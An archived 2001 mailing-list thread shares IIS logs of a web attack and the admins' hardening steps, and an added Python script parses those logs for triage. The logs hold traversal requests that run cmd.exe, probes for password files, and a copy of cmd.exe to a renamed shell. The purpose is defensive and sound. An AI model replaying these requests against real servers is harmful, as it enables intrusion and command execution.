but this was an exploit (according to what I've read) of a SEVEN-month-old
security issue.

I can sympathize with being "hacked", but we admins also need to be very
alert and up-to-date on these issues. I'm not saying I'm perfect, but
there are a few perspectives to this most recent group of attacks. It's not
like it was an undocumented problem, or even a new one.

-----Original Message-----
From: Erika L Walker [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 09, 2001 10:07 AM
To: CF-Community
Subject: RE: Log files of a web attack.


Ahh....but someone (a hacker more than likely) had to create the worm in the
first place.

Either way, it's a da** pain in the you know what!

Erika
(with a *K*)

"To laugh often and much; to win the respect of intelligent people and the
affection of children; to earn the appreciation of honest critics and endure
the betrayal of false friends; to appreciate beauty, to find the best in
others; to leave the world a bit better, whether by a healthy child, a
garden, or a redeemed social condition; to know even one life has breathed
easier because you have lived. This is to have succeeded." - Ralph Waldo
Emerson

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, May 09, 2001 12:15 PM
To: CF-Community
Subject: RE: Log files of a web attack.


Hello All,

If you have been hit by this "hack", it isn't a hack. It's a worm.
http://www.internetnews.com/wd-news/article/0,,10_761061,00.html this
article has all the info.

Cheers

J "Darin" Thomas - Web Developer
Destin Resorts
[EMAIL PROTECTED]

-----Original Message-----
From: Erika L Walker [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 08, 2001 11:30 PM
To: CF-Community
Subject: FW: Log files of a web attack.


In light of recent hack attacks.....this was posted on CF-Talk.....not that
the people here aren't on CF-Talk, but, ya know, someone said we should pass
around this info so we know how to deal with it and what to look for...so
here's some more info! <grin>

(lettuce, mayo, pickle on a sesame seed bun....)



ReplaceNoCase("Erica", "c", "k", "ALL")

"Once in a while it really hits people that they don't have to experience
the world in the way they have been told to." - Alan Keightley

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 08, 2001 9:52 PM
To: CF-Talk
Subject: OT: Log files of a web attack.


Hi,

I thought the group would like to see the techniques of a recent attack on
our web servers. They've been doing this a couple of times a day for a week.
UUNet (their ISP) is slow in stopping them.

To secure IIS we've removed all extensions except cfm. We've taken out all
the IIS folders and files like /mdac, /scripts and /printers. We've secured
the cfide folder with passwords, including locking out the user after a couple of
failed attempts and logging the failures. Lastly, we've removed all permissions
from cmd.exe.

This has kept them out to date. Any additional ideas are welcomed. None of
this is top secret info, the hackers already know it, but do you, and are you
protected?

HTH,

Rick Moon


2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/..%pc../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:45 209.183.204.251 - myIP 80 GET /scripts/..%9v../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:56 209.183.204.251 - myIP 80 GET /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET /scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET /scripts/...../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:04 209.183.204.251 - myIP 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET /scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:38:17 209.183.204.251 - myIP 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 01:26:07 200.245.48.155 - myIP GET /scripts..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:57:58 200.230.112.153 - myIP 80 GET /iisadmpwd/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:00 200.230.112.153 - myIP 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:14 200.230.112.153 - myIP 80 GET /cgi-bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:22 200.230.112.153 - myIP 80 GET /samples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:29 200.230.112.153 - myIP 80 GET /_vti_cnf/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:36 200.230.112.153 - myIP 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:42 200.230.112.153 - myIP 80 GET /adsamples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:02 200.245.48.132 - myIP 80 HEAD /aaa - 404 -
2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /carbo.dll - 404 -
2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /cgi-win/uploader.exe - 404 -
2001-05-05 02:43:06 200.245.48.132 - myIP 80 HEAD /search97.vts - 404 -
2001-05-05 02:43:08 200.245.48.132 - myIP 80 HEAD /_vti_inf.html - 200 -
2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd - 404 -
2001-05-05 02:43:12 200.245.48.132 - myIP 80 HEAD /_vti_pvt/users.pwd - 404 -
2001-05-05 02:43:13 200.245.48.132 - myIP 80 HEAD /_vti_pvt/authors.pwd - 404 -
2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /....../autoexec.bat - 404 -
2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /..../config.sys - 404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr - 404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp.htr - 404 -
2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2.htr - 404 -
2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2b.htr - 404 -
2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp3.htr - 404 -
2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4.htr - 404 -
2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4b.htr - 404 -
2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot.htr - 404 -
2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot3.htr - 404 -
2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /cgi-bin/visadmin.exe - 404 -
2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/no-such-file.pl - 404 -
2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/fpcount.exe - 404 -
2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/rguest.exe - 404 -
2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/wguest.exe - 404 -
2001-05-05 02:43:32 200.245.48.132 - myIP 80 HEAD /default.asp::$DATA - 404 -
2001-05-05 02:43:35 200.245.48.132 - myIP 80 HEAD /msadc/Samples/SELECTOR/showcode.asp |-|0|404_Object_Not_Found 404 -
2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /adsamples/config/site.csc - 404 -
2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /scripts/iisadmin/ism.dll http/dir 404 -
2001-05-05 02:43:37 200.245.48.132 - myIP 80 HEAD /AdvWorks/equipment/catalog_type.asp |-|0|404_Object_Not_Found 404 -
2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/openfile.cfm - 401 -
2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/ExprCalc.cfm - 401 -
2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/displayopenedfile.cfm - 401 -
2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/sendmail.cfm - 401 -
2001-05-05 02:43:45 200.245.48.132 - myIP 80 HEAD /GetFile.cfm - 200 -
2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/get32.exe - 404 -
2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/alibaba.pl - 404 -
2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /cgi-bin/tst.bat - 404 -
2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /default.asp - 404 -
2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /winnt/repair/sam._ - 404 -
2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /cgi-bin/imagemap.exe - 404 -
2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90)
2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /cgi-bin/cgitest.exe - 404 -
2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /config.sys - 404 -
2001-05-05 02:43:55 200.245.48.132 - myIP 80 HEAD /scripts/webbbs.exe - 404 -
2001-05-05 02:43:57 200.245.48.132 - myIP 80 HEAD /cgi-bin/input.bat - 404 -
2001-05-05 02:44:03 200.245.48.132 - myIP 80 HEAD /test.idq - 404 -
2001-05-05 02:44:04 200.245.48.132 - myIP 80 HEAD /test.ida - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /scripts/counter.exe - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /common/browser.inc - 404 -
2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/echo.bat - 404 -
2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/hello.bat - 404 -
2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /rightfax/fuwww.dll - 404 -
2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /scripts/cgimail.exe - 404 -
2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /officescan/cgi/jdkRqNotify.exe - 404 -
2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /ows-bin/perlidlc.bat &dir 404 -
2001-05-05 02:44:13 200.245.48.132 - myIP 80 HEAD /cgi-bin/windmail.exe - 404 -
2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /null.htw CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 404 -
2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /_vti_bin/_vti_aut/dvwssr.dll - 404 -
2001-05-05 02:44:17 200.245.48.132 - myIP 80 HEAD /scripts/wa.exe - 404 -
2001-05-05 02:45:22 200.64.239.78 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-05 02:46:23 200.53.250.14 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-05 02:48:53 200.245.48.141 - myIP 80 HEAD /index.cfm - 200 -
2001-05-05 02:49:25 200.245.48.141 - myIP 80 GET /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:36 200.245.48.141 - myIP 80 GET /scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:48 200.245.48.141 - myIP 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:53 200.245.48.141 - myIP 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:50:05 200.245.48.141 - myIP 80 GET /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:50:11 200.245.48.141 - myIP 80 GET /scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/newdsn.exe - 404 -
2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/getdrvs.exe - 404 -
2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/administrators.pwd - 404 -
2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.dll - 404 -
2001-05-05 02:43:16 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.exe - 404 -
2001-05-05 02:43:17 200.245.48.132 - myIP HEAD /samples/search/queryhit.htm - 404 -
2001-05-05 02:43:33 200.245.48.132 - myIP HEAD /iissamples/exair/howitworks/codebrws.asp - 404 -
2001-05-05 02:43:33 200.245.48.132 - myIP HEAD /iissamples/sdk/asp/docs/codebrws.asp - 404 -
2001-05-05 02:43:56 200.245.48.132 - myIP HEAD /cgi-bin/test.bat - 404 -
2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /cgi-bin/input2.bat - 404 -
2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /ssi/envout.bat - 404 -
2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /msadc/msadcs.dll - 404 -
2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /cgi-bin/htimage.exe - 404 -
2001-05-05 02:44:02 200.245.48.132 - myIP HEAD /test.idc - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP HEAD /test.idw - 404 -
2001-05-05 02:44:11 200.245.48.132 - myIP HEAD /default.asp - 404 -
This is the really bad one.
2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe
2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET /scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot

end.
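A defender-side way to triage log lines like the ones Rick posted, as an added example (it is not Rick's tooling or anything from the list). It locates the fields relative to the method token, because some of the posted lines omit the port column, URL-decodes the stem and query, and classifies each request as reconnaissance, traversal, command execution, or a copy of the shell under a new name. The sample lines are constructed from the entries above; the 200 status on the last two is an assumption, since the posted lines are cut off before the status field, and the watchlist of probed paths is taken from the posted log.

```python
"""Triage IIS W3C extended log lines for the traversal and scan patterns
posted in this thread.  Added example, not the poster's own tooling.
Field layout is assumed from the posted lines:
  date time c-ip cs-username s-ip [s-port] method cs-uri-stem cs-uri-query [sc-status [cs(User-Agent)]]
Some of the posted lines omit s-port, so fields are found relative to the method."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample, modelled on the posted entries.  The "200" on the last two
# lines is assumed; the posted lines are truncated before the status column.
SAMPLE_LOG = """\
2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/..%pc../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 01:26:07 200.245.48.155 - myIP GET /scripts..\\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd - 404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr - 404 -
2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90)
2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy%20c:\\winnt\\system32\\cmd.exe%20sensepost.exe 200 -
2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET /scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\\inetpub\\wwwroot 200 -
"""

METHODS = {"GET", "HEAD", "POST"}

# Paths the scanner in the posted log probed: FrontPage, ColdFusion and IIS
# sample/admin files.  Watchlist taken from the posted log; extend for your site.
RECON_PREFIXES = ("/_vti_", "/iisadmpwd/", "/msadc/", "/cfdocs/", "/iissamples/",
                  "/scripts/tools/", "/cgi-bin/", "/samples/", "/adsamples/", "/winnt/")
RECON_SUFFIXES = (".pwd", ".htr", ".ida", ".idq", ".idc", ".idw", ".bat", ".inc", "::$data")

SEVERITY_RANK = {"none": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}


def parse_line(line):
    """Split one W3C log line into a dict; None if no method token is present."""
    tok = line.split()
    idx = next((i for i, t in enumerate(tok) if t in METHODS), None)
    if idx is None or len(tok) < idx + 3:
        return None
    return {
        "time": f"{tok[0]} {tok[1]}",
        "client": tok[2],
        "method": tok[idx],
        "stem": unquote(tok[idx + 1]),    # invalid escapes like %pc are left as-is
        "query": unquote(tok[idx + 2]),
        "status": tok[idx + 3] if len(tok) > idx + 3 else None,
    }


def classify(rec):
    """Return (category, severity) for a parsed record."""
    stem, query = rec["stem"].lower(), rec["query"].lower()
    served = rec["status"] == "200"
    cmd_arg = re.match(r"/c[+ ]", query) is not None   # a "/c <command>" argument
    if cmd_arg and "copy" in query and "cmd.exe" in query:
        # The shell being copied under a new name: a later filter keyed on the
        # literal "cmd.exe" will no longer see the follow-up requests.
        return "shell_copy", "critical"
    if cmd_arg:
        # Key on the argument form, not the binary name, so renamed shells match too.
        return "command_execution", "critical" if served else "high"
    if ".." in stem or "\\" in stem:
        return "traversal", "critical" if served else "medium"
    if stem.startswith(RECON_PREFIXES) or stem.endswith(RECON_SUFFIXES):
        return "recon", "medium" if served else "low"
    return "benign", "none"


def triage(log_text):
    """Return (findings, per-client summary) for every non-benign line."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        cat, sev = classify(rec)
        if cat != "benign":
            findings.append({**rec, "category": cat, "severity": sev})
    summary = defaultdict(lambda: {"categories": Counter(), "worst": "none"})
    for f in findings:
        s = summary[f["client"]]
        s["categories"][f["category"]] += 1
        if SEVERITY_RANK[f["severity"]] > SEVERITY_RANK[s["worst"]]:
            s["worst"] = f["severity"]
    return findings, dict(summary)


if __name__ == "__main__":
    findings, summary = triage(SAMPLE_LOG)
    for f in findings:
        print(f"{f['time']} {f['client']:16} {f['severity']:9} {f['category']:18} {f['stem']}")
    for client, s in summary.items():
        print(client, s["worst"], dict(s["categories"]))
```

The reason the classifier keys on the "/c" argument rather than the string "cmd.exe" is visible in the last two entries of Rick's log: the first request copies cmd.exe to sensepost.exe, and the second runs the copy. A filter that only looks for "cmd.exe" in the path reports the first request and misses the second, which is the one that matters. Every 200 on a flagged request is escalated, because a 404 means the hardening held and a 200 means it did not.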
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-community@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists